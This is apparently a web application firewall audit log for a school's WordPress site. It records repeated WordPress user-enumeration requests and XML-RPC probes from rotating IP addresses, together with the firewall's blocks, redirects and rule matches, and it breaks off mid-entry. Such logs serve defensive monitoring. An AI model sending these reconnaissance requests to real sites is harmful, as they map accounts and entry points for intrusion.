Stopwatch: 1747440899704335 2983 (- - -) Stopwatch2: 1747440899704335 2983; combined=1318, p1=430, p2=848, p3=0, p4=0, p5=40, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4229c135-Z-- --011b657b-A-- [17/May/2025:07:15:00 +0700] aCfVBHyxdQCiyU1ENFcmoQAAAAk 103.236.140.4 42502 103.236.140.4 8181 --011b657b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.115.81 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.115.81 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --011b657b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --011b657b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747440900059973 1916 (- - -) Stopwatch2: 1747440900059973 1916; combined=997, p1=330, p2=642, p3=0, p4=0, p5=25, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --011b657b-Z-- --815a0c4c-A-- [17/May/2025:07:15:05 +0700] aCfVCem4kjNN-hEbWjJApQAAAEQ 103.236.140.4 42508 103.236.140.4 8181 --815a0c4c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.115.81 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.115.81 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --815a0c4c-C-- demo.sayHello --815a0c4c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --815a0c4c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747440905038029 5973 (- - -) Stopwatch2: 1747440905038029 5973; combined=4350, p1=544, p2=3581, p3=29, p4=30, p5=97, sr=75, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --815a0c4c-Z-- --9e78fa76-A-- [17/May/2025:07:15:05 +0700] aCfVCXyxdQCiyU1ENFcmowAAAAw 103.236.140.4 42510 103.236.140.4 8181 --9e78fa76-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.41.201 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.41.201 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9e78fa76-C-- demo.sayHello --9e78fa76-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9e78fa76-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747440905597344 4811 (- - -) Stopwatch2: 1747440905597344 4811; combined=3660, p1=462, p2=2996, p3=24, p4=27, p5=89, sr=76, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9e78fa76-Z-- --e208e400-A-- [17/May/2025:07:15:12 +0700] aCfVEOm4kjNN-hEbWjJAqAAAAEg 103.236.140.4 42516 103.236.140.4 8181 --e208e400-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.47.59 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.47.59 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e208e400-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e208e400-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747440912628214 3304 (- - -) Stopwatch2: 1747440912628214 3304; combined=1413, p1=478, p2=902, p3=0, p4=0, p5=32, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e208e400-Z-- --0726f55e-A-- [17/May/2025:07:15:14 +0700] aCfVEum4kjNN-hEbWjJAqQAAAEk 103.236.140.4 42518 103.236.140.4 8181 --0726f55e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.41.101 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.41.101 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0726f55e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0726f55e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747440914083848 2826 (- - -) Stopwatch2: 1747440914083848 2826; combined=1276, p1=492, p2=756, p3=0, p4=0, p5=28, sr=156, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0726f55e-Z-- --090c762f-A-- [17/May/2025:07:15:16 +0700] aCfVFOm4kjNN-hEbWjJAqgAAAEo 103.236.140.4 42524 103.236.140.4 8181 --090c762f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.47.59 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.47.59 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --090c762f-C-- demo.sayHello --090c762f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --090c762f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747440916231683 6481 (- - -) Stopwatch2: 1747440916231683 6481; combined=4676, p1=636, p2=3802, p3=37, p4=43, p5=95, sr=82, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --090c762f-Z-- --3852e522-A-- [17/May/2025:07:15:18 +0700] aCfVFnyxdQCiyU1ENFcmpgAAAA8 103.236.140.4 42526 103.236.140.4 8181 --3852e522-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.41.101 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.41.101 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3852e522-C-- demo.sayHello --3852e522-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3852e522-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747440918301751 5409 (- - -) Stopwatch2: 1747440918301751 5409; combined=4086, p1=545, p2=3325, p3=29, p4=32, p5=91, sr=80, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3852e522-Z-- --d29d4c0e-A-- [17/May/2025:07:15:18 +0700] aCfVFnyxdQCiyU1ENFcmqAAAABQ 103.236.140.4 42530 103.236.140.4 8181 --d29d4c0e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.201.11.12 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.201.11.12 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d29d4c0e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d29d4c0e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747440918977894 2054 (- - -) Stopwatch2: 1747440918977894 2054; combined=1051, p1=347, p2=677, p3=0, p4=0, p5=26, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d29d4c0e-Z-- --63360845-A-- [17/May/2025:07:15:26 +0700] aCfVHnyxdQCiyU1ENFcmqgAAABg 103.236.140.4 42536 103.236.140.4 8181 --63360845-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.183.51 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.183.51 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --63360845-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --63360845-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747440926044731 15775 (- - -) Stopwatch2: 1747440926044731 15775; combined=27264, p1=385, p2=810, p3=0, p4=0, p5=13051, sr=74, sw=1, l=0, gc=13017 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --63360845-Z-- --d0708424-A-- [17/May/2025:07:15:29 +0700] aCfVIXyxdQCiyU1ENFcmqwAAAAA 103.236.140.4 42538 103.236.140.4 8181 --d0708424-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.201.11.12 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.201.11.12 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d0708424-C-- demo.sayHello --d0708424-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d0708424-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747440929199541 5815 (- - -) Stopwatch2: 1747440929199541 5815; combined=4170, p1=549, p2=3409, p3=29, p4=31, p5=91, sr=75, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d0708424-Z-- --d5922037-A-- [17/May/2025:07:15:33 +0700] aCfVJXyxdQCiyU1ENFcmrgAAAAQ 103.236.140.4 42544 103.236.140.4 8181 --d5922037-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.183.51 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.183.51 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d5922037-C-- demo.sayHello --d5922037-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d5922037-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747440933468461 5649 (- - -) Stopwatch2: 1747440933468461 5649; combined=4155, p1=545, p2=3387, p3=32, p4=36, p5=92, sr=75, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d5922037-Z-- --fb6f7942-A-- [17/May/2025:07:15:34 +0700] aCfVJnyxdQCiyU1ENFcmrwAAAAU 103.236.140.4 42546 103.236.140.4 8181 --fb6f7942-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.112.75 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.112.75 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --fb6f7942-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fb6f7942-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747440934923766 1990 (- - -) Stopwatch2: 1747440934923766 1990; combined=1008, p1=325, p2=656, p3=0, p4=0, p5=26, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fb6f7942-Z-- --c414ee2f-A-- [17/May/2025:07:15:39 +0700] aCfVK-m4kjNN-hEbWjJArAAAAE0 103.236.140.4 42552 103.236.140.4 8181 --c414ee2f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.112.75 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.112.75 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c414ee2f-C-- demo.sayHello --c414ee2f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c414ee2f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747440939388245 5434 (- - -) Stopwatch2: 1747440939388245 5434; combined=4092, p1=516, p2=3237, p3=34, p4=29, p5=181, sr=119, sw=95, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c414ee2f-Z-- --15d52f2c-A-- [17/May/2025:07:15:46 +0700] aCfVMnyxdQCiyU1ENFcmsgAAAAo 103.236.140.4 42556 103.236.140.4 8181 --15d52f2c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.93.48 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.93.48 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --15d52f2c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --15d52f2c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747440946045929 3189 (- - -) Stopwatch2: 1747440946045929 3189; combined=1431, p1=493, p2=905, p3=0, p4=0, p5=32, sr=91, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --15d52f2c-Z-- --bae88b01-A-- [17/May/2025:07:15:54 +0700] aCfVOum4kjNN-hEbWjJArQAAAE4 103.236.140.4 42560 103.236.140.4 8181 --bae88b01-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.93.48 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.93.48 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --bae88b01-C-- demo.sayHello --bae88b01-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --bae88b01-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747440954674482 5886 (- - -) Stopwatch2: 1747440954674482 5886; combined=4205, p1=541, p2=3495, p3=24, p4=27, p5=69, sr=78, sw=49, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bae88b01-Z-- --62a83b6f-A-- [17/May/2025:07:16:04 +0700] aCfVRHyxdQCiyU1ENFcmtQAAABA 103.236.140.4 42564 103.236.140.4 8181 --62a83b6f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.165.97 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.165.97 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --62a83b6f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --62a83b6f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747440964202700 3497 (- - -) Stopwatch2: 1747440964202700 3497; combined=1477, p1=503, p2=941, p3=0, p4=0, p5=32, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --62a83b6f-Z-- --a4550217-A-- [17/May/2025:07:16:11 +0700] aCfVS3yxdQCiyU1ENFcmtwAAAA8 103.236.140.4 42568 103.236.140.4 8181 --a4550217-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.165.97 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.165.97 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a4550217-C-- demo.sayHello --a4550217-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a4550217-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 